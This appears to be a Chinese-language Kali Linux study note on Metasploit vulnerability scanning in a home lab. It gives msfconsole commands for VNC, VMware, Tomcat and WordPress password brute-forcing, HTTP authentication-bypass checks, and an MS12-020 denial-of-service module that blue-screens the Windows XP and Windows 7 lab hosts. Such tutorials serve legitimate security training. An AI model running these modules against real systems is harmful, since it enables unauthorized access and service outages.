Kali linux 学习笔记（九十五）metasploit framework——弱点扫描 2020.4.27

前言

本节学习用msf弱点扫描

• 根据信息收集结果搜索漏洞利用模块
• 结合外部漏洞扫描系统对大量IP地址段进行批量扫描
• 肯定有误判和漏判，可以验证

1、准备

目标机metasploitable

IP：192.168.1.120

netstat -pantu |grep 5900 #确认vnc是否开放

目标机winxp

远程桌面打开
防火墙关掉
IP：192.168.1.122

目标机win7

远程桌面打开
防火墙关掉
IP：192.168.1.123

攻击机kali

IP：192.168.1.121

service postgresql start
netstat -pantu | grep 5432 #确认端口开放
msfconsole

2、vnc密码破解

msf > use auxiliary/scanner/vnc/vnc_login
msf auxiliary(scanner/vnc/vnc_login) > show options
msf auxiliary(scanner/vnc/vnc_login) > set BLANK_PASSWORDS true
msf auxiliary(scanner/vnc/vnc_login) > set THREADS 20 #线程数
msf auxiliary(scanner/vnc/vnc_login) > set RHOSTS 192.168.1.120
msf auxiliary(scanner/vnc/vnc_login) > run
#注意寻求合适的密码字典，默认有个

3、VNC 无密码访问（未设置密码）

这是服务器配置有问题，可以试试

msf > use auxiliary/scanner/vnc/vnc_none_auth
msf auxiliary(scanner/vnc/vnc_none_auth) > set RHOSTS 192.168.1.120
msf auxiliary(scanner/vnc/vnc_none_auth) > run
#端口可以根据实际情况修改，线程1个就够了

4、RDP 远程桌面漏洞

非常有名的漏洞ms12_020

msf > use auxiliary/scanner/rdp/ms12_020_check #检查不会造成 DoS 攻击
msf auxiliary(scanner/rdp/ms12_020_check) > set RHOSTS 192.168.1.122 192.168.1.123
msf auxiliary(scanner/rdp/ms12_020_check) > run
#发现两个都有漏洞，尝试攻击
msf >use auxiliary/dos/windows/rdp/ms12_020_maxchannelids #这个会造成DoS攻击
msf auxiliary(ms12_020_maxchannelids) > set RHOSTS 192.168.1.122
msf auxiliary(ms12_020_maxchannelids) > run
#xp蓝屏重启
msf auxiliary(ms12_020_maxchannelids) > set RHOSTS 192.168.1.123
msf auxiliary(ms12_020_maxchannelids) > run
#win7蓝屏重启

5、设备后门

msf > use auxiliary/scanner/ssh/juniper_backdoor #juniper 防火墙，只要指定rhost
msf > use auxiliary/scanner/ssh/fortinet_backdoor #fortinet 防火墙，只要指定rhost

6、VMware

#爆破账号密码
msf > use auxiliary/scanner/vmware/vmauthd_login
msf auxiliary(vmauthd_login) > set BLANK_PASSWORDS true
msf auxiliary(vmauthd_login) > set RHOSTS 192.168.1.0/24
msf auxiliary(vmauthd_login) > set PASS_FILE /usr/share/metasploit-framework/data/wordlists/vmworks_common_20.txt
msf auxiliary(vmauthd_login) > set USERNAME root
msf auxiliary(vmauthd_login) > run
#得到权限后枚举所有虚拟机
msf > use auxiliary/scanner/vmware/vmware_enum_vms
#还有其他的各种信息模块可用
#利用 WEB API 远程开启虚拟机
msf > use auxiliary/admin/vmware/poweron_vm

7、HTTP 弱点扫描

#过期证书
msf > use auxiliary/scanner/http/cert
msf auxiliary(scanner/http/cert) > set RHOSTS 192.168.1.120
msf auxiliary(scanner/http/cert) > set THREADS 20
msf auxiliary(scanner/http/cert) > run
#显示目录及文件
msf > use auxiliary/scanner/http/dir_listing
msf auxiliary(scanner/http/dir_listing) > set RHOSTS 192.168.1.120
msf auxiliary(scanner/http/dir_listing) > set PATH dav
msf auxiliary(scanner/http/dir_listing) > run
msf auxiliary(scanner/http/dir_listing) > use auxiliary/scanner/http/files_dir
msf auxiliary(scanner/http/files_dir) > set RHOSTS 192.168.1.120
msf auxiliary(scanner/http/files_dir) > run
#WebDAV Unicode 编码身份验证绕过
msf > use auxiliary/scanner/http/dir_webdav_unicode_bypass
msf auxiliary(scanner/http/dir_webdav_unicode_bypass) > set RHOSTS 192.168.1.120
msf auxiliary(scanner/http/dir_webdav_unicode_bypass) > set THREADS 20
msf auxiliary(scanner/http/dir_webdav_unicode_bypass) > run
#Tomcat 管理登录页面
msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(scanner/http/tomcat_mgr_login) > set RHOSTS 192.168.1.120
msf auxiliary(scanner/http/tomcat_mgr_login) > run
#基于 HTTP 方法的身份验证绕过
msf > use auxiliary/scanner/http/verb_auth_bypass
msf auxiliary(scanner/http/verb_auth_bypass) > set RHOSTS 192.168.1.120
msf auxiliary(scanner/http/verb_auth_bypass) > run
#Wordpress 密码爆破
msf > use auxiliary/scanner/http/wordpress_login_enum
msf auxiliary(scanner/http/wordpress_login_enum) > set RHOSTS 192.168.1.120
msf auxiliary(scanner/http/wordpress_login_enum) > run

8、WMAP WEB 应用扫描器

根据 sqlmap 的工作方式开发
是个插件wmap

msf > load wmap
msf > wmap_sites -h
msf > wmap_sites -a http://192.168.1.120
msf > wmap_targets -t http://192.168.1.120/mutillidae/index.php
msf > wmap_run -h
msf > wmap_run -t #列出所有模块
msf > wmap_run -e #开始扫描
msf > wmap_vulns -l #查看扫描出的漏洞
msf > vulns

9、openvas

命令行模式，需要配置，使用麻烦
所以使用web界面127.0.0.1/9392
扫描之后生成nde格式报告1.nbe
msf导入nbe扫描日志1.nbe

msf > load openvas 
msf > openvas_help
msf > db_import 1.nbe
msf > vulns 

10、MSF 直接调用 nessus 执行扫描

直接连接nessus

msf > load nessus
msf > nessus_help
msf > nessus_connect admin:[email protected]
msf > nessus_policy_list
msf > nessus_scan_new
msf > nessus_report_list

结语

msf弱点扫描的手段丰富
且有很多第三方插件可用